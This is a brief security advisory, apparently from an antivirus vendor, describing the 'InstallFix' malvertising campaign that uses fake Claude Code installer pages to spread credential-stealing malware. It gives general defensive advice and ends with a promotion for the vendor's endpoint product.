Fake Claude AI installer phishing page delivering malware through sponsored Google Ads results

Cybercriminals are exploiting the growing popularity of AI tools by creating fake Claude AI installer pages designed to infect users with malware. Attackers are purchasing Google Ads to place fraudulent “Claude Code” installation pages at the top of search results, tricking users into running malicious commands on Windows and macOS systems. The campaign, known as “InstallFix,” focuses on manipulating user trust rather than exploiting software vulnerabilities directly.

Fake Claude AI installer phishing page delivering malware through sponsored Google Ads resultsFake Claude AI installer phishing page delivering malware through sponsored Google Ads results

Once victims follow the fake installation steps, the malware launches a multi-stage infection chain that collects system information, disables security protections, creates persistence through scheduled tasks, and connects to attacker-controlled servers. Researchers linked the campaign to tactics previously associated with RedLine Stealer malware, including browser credential theft, e-wallet targeting, and stealthy command execution using legitimate Windows tools like mshta.exe and PowerShell. The use of customized command-and-control URLs for each victim makes detection and blocking more difficult.

Security experts recommend avoiding sponsored search results when downloading software, verifying installation pages through official vendor websites, and using trusted package managers whenever possible. Organizations should also restrict legacy scripting tools, block suspicious domains, and strengthen endpoint monitoring. NPAV EPS uses Zero Deep Learning AI to detect malicious scripts, fake installer activity, credential theft attempts, and advanced malware behavior before attackers can compromise systems.


Hackers are weaponizing trusted AI brands. NPAV EPS detects malicious installers, hidden payloads, and advanced malware behavior before damage begins.